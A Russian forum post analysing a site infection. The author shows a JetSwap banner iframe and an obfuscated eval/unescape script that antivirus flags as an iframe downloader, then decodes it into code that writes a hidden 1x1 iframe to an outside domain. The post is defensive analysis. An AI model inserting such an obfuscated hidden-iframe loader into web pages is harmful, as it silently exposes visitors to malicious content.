На его форуме обнаружил инфрейм + какую-то гадость в архиве.
Заходим на форум. Смотрим исходный код страницы и видим инфрейм:
Нажми для просмотра
<!--JetSwap Banner Network-->
<iframe src=http://go.jetswap.com/bb?cmd=ad&user=edgar666&net=88 scrolling=no border=0 frameborder=0 width=88 height=31></iframe>
<!--JetSwap Banner Network-->
<a href=http://list.jetswap.com/?cmd=in&u=USER target=_top><img src=cat13.gif border=0 alt='Каталог системы JetSwap'></a>
</body>
</html>
Далее идём в архив, Меня не пускает антивирус НОД 32. Кричит, что это инфрейм довнлоадер.Открываем исходный код страницы и смотрим. В самом конце виден вот такой зашифрованный скриптик:
Нажми для просмотра
<script>eval(unescape('%65%76%61%6C%28%66%75%6E%63%74%69%6F%6E%28%61%55%2C%75%76%62%2C%54%4F%68%2C%63%71%51%2C%45%68%43%2C%41%4D%29%7B%45%68%43%3D%53% 74%72%69%6E%67%3B%69%66%28%21%27%27%2E%72%65%70%6C%61%63%65%28%2F%5E%2F%2C%53%74%72%69%6E%67%29%29%7B%77%68%69%6C%65%28%54%4F%68%2D%2D%29%41%4D%5B%54% 4F%68%5D%3D%63%71%51%5B%54%4F%68%5D%7C%7C%54%4F%68%3B%63%71%51%3D%5B%66%75%6E%63%74%69%6F%6E%28%45%68%43%29%7B%72%65%74%75%72%6E%20%41%4D%5B%45%68%43% 5D%7D%5D%3B%45%68%43%3D%66%75%6E%63%74%69%6F%6E%28%29%7B%72%65%74%75%72%6E%27%5C%5C%77%2B%27%7D%3B%54%4F%68%3D%31%7D%3B%77%68
Пробуем расшифровать. У меня получилось вот что:
Нажми для просмотра
eval(function(aU,uvb,TOh,cqQ,EhC,AM){EhC=String;if(!''.replace(/^/,String)){while(TOh--)AM[TOh]=cqQ[TOh]||TOh;cqQ=[function(EhC){return AM[EhC]}];EhC=function(){return'\\w+'};TOh=1};while(TOh--)if(cqQ[TOh])aU=aU.replace(new RegExp('\\b'+EhC(TOh)+'\\b','g'),cqQ[TOh]);return aU}('5.2("<8 7=\\"6://4.0/\\" 3=1 9=1>");',10,10,'com||write|width|besloqawe|document|http|src|iframe|height'.split('|'),0,{}))
Пока на этом всё. Смотреть дальше буду.